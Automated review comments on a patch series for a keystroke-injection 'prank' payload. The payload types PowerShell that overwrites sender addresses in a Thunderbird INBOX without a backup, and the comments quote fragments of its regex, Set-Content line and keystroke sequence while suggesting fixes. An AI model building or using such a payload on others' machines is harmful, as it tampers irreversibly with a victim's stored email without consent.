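Review bot: In PATCH 1/9's payload.txt hunk, the typed `-replace` pattern starts with `From:\s.*\s<` and has no start-of-line anchor, so it also rewrites any `From: ... <address>` text that appears in message bodies (quoted replies, forwarded headers). That contradicts the README's claim that only sender addresses are touched. Anchor the pattern to the start of a header line or state the limitation in the README. The result is written back with `Set-Content -Path $newPath -Value $modifiedEmails -Force` with no copy of the original INBOX kept and no `-Encoding` on either `Get-Content` or `Set-Content`, so the change cannot be undone and non-ASCII message bytes may be altered. The README Notes should say this, and a backup copy taken before the write would make the prank reversible. The comment `# Check whether the INBOX file exists` is typed twice, the second time above `Get-Content`, where it should describe reading the file.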
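Review bot: In PATCH 3/9, `QUACK REPEAT 11 TAB` and `QUACK REPEAT 4 TAB` become runs of bare `QUACK TAB` lines with no count and no named target, which makes the navigation impossible to check by reading the file. Add a comment above each run giving the count and the control it is expected to land on. The README lists Thunderbird 115.11.1 as the only tested version, and with a different tab order the following `QUACK ENTER`, `QUACK CTRL c` and `QUACK ALT F4` act on whatever control or window has focus. The subject `Removed DS3 stuff` should also say why `REPEAT` was dropped.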
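Review bot: In PATCH 5/9's `-replace` line, the new single-quote delimiters collide with the apostrophe still inside the character class (`!#$%&'*+`), so the PowerShell string ends at that apostrophe and the rest of the pattern is parsed as stray tokens. The same edit turns the backtick-escaped double quote into a backtick plus apostrophe, so the quoted-local-part branch no longer looks for a double quote at all. PATCH 6/9 repairs both, so the two commits should be squashed, with the message recording that the pattern no longer accepts an apostrophe in the local part.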
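Review bot: In PATCH 6/9's `-replace` line, the backtick kept in front of each double quote was a PowerShell escape only while the pattern was double-quoted. Inside the single-quoted string introduced in PATCH 5/9 it is a literal character, so the quoted-local-part branch now requires a backtick before the quote and will not match a real quoted address. Remove the backtick in both places. The subject repeats PATCH 5/9's `[~] From " to '`, although this commit changes the character class and two comment lines, so it should describe those changes instead.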
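Review bot: In PATCH 9/9, the subject `$ -> \$` covers only one of three changes: the header and section comments move from `* REM` to `#`, and a new `QUACK DELAY 1500` is added before the first `QUACK GUI r`. Split these out or name them in the message. After PATCH 8/9's `\"` and this commit's `\$`, the `QUACK STRING` lines carry backslashes that are not part of the PowerShell being typed, and nothing in the file says which layer removes them. Add a comment at the top of payload.txt stating the escaping convention so the typed regex can be checked against the one documented in the README.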